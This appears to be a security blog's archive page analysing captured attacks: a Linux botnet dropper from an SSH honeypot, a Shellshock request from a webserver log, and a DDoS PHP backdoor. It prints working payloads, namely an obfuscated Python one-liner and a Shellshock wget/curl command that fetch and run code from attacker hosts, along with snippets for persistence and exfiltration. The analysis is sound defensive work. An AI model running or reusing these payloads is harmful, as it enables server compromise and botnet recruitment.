Archive for the ‘exploits’ Category

Linux Botnet

Wednesday, January 10th, 2018

another nice ssh honeypot-catch:

uname nohup python -c "import base64;exec(base64.b64decode('I2NvZGluZzogdXRmLTgKaW1wb3J0IHVybGxpYgppbXBvcnQgYmFzZTY0CndoaWxlIFRydWU6CiAgICB0cnk6CiAgIC
AgICAgcGFnZT1iYXNlNjQuYjY0ZGVjb2RlKHVybGxpYi51cmxvcGVuKCJodHRwOi8vay56c3c4LmNjL0FwaS8iKS5yZWFkKCkpCiAgICAgICAgZXhlYyhwYW
dlKQogICAgZXhjZXB0OgogICAgICAgIHBhc3MKICAgIHRpbWUuc2xlZXAoMzAwKQ=='))" > /dev/null 2 >& 1 &

That downloads a base64-encoded complete python-program fromĀ  http://k.zsw8.cc/Api/

In that program a crontab-entry is made

   if runCodePath not in crontabData:
                f = open("/etc/crontab", "a+")
                f.write("\n0 */6 * * * root %s\n" % runCodePath)

then it loads data about the hacked server to the herder:

   my_data = {"key":d.get_key, "name":d.get_name, "os":d.get_platform, "core":d.get_core, "cpu":d.get_cpucount, "cpuuse":d.get_cpuuse, "status":d.get_status}
            f = urllib.urlopen(apiURL, urllib.urlencode(my_data))

and waits for commands:

 

  if data.has_key("download") and data["download"]:
                    DownExec(data["download"], task_id)
       if data.has_key("cmd") and data["cmd"]:
                    CmdExec(data["cmd"], task_id)

Wonder what would happen if the computer name would be a beef-xss hook or something..?

recently in the webserver log ..

Monday, August 17th, 2015

While strolling through the webserver-logs, I found this little asshole..:

78.25.80.226 - - [16/Aug/2015:21:35:01 +0200] "GET /suspendedpage.cgi
HTTP/1.1" 404 494 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget
http://189.11.9.243/fix.pl;curl -O http://189.11.9.243/fix.pl;fetch
http://189.11.9.243/fix.pl;lwp-download http://189.11.9.243/fix.pl;perl
fix.pl;rm -rf fix.pl;rm -rf fix.pl*\""

fix.pl installs an irc-connection and waits for commands like
portscan, tcpflood or a reverse shell ..

Looks like there are still servers out there which are vulnerable to shellshock ..

DDoS PHP-Script

Tuesday, December 18th, 2012

Just recently the BSI warned about an ongoing attack to US Banks.
The php-script involved showed a “404” Error when called without any
arguments.

A closer looks shows a “404 Not Foun derror” WITH the typo in it.
Now we have a neat string to search for in google or wherever..
and bingo: some other victom already posted the source code
of the infected webserver:

 

Here we can see that a POST action “stop” makes the DDoS go away..


function stoped()
{
@unlink($base."stmdu.php");
@unlink($base."stp.hp");
cmdexec("killall ping;");
print "Stop & Clean";
}

And here is where the typo sits:


if(md5(md5(md5($_REQUEST['pass'])))!=$pass_up and $_SESSION['LoGiN']!=true)
{
print "404 Not Found

Not Found

The requested URL ".$_SERVER['PHP_SELF']." was not found on this server

Additionally, a 404 Not Foun derror was encountered while trying to use an Error Document to handle the request

";
die();
exit();
}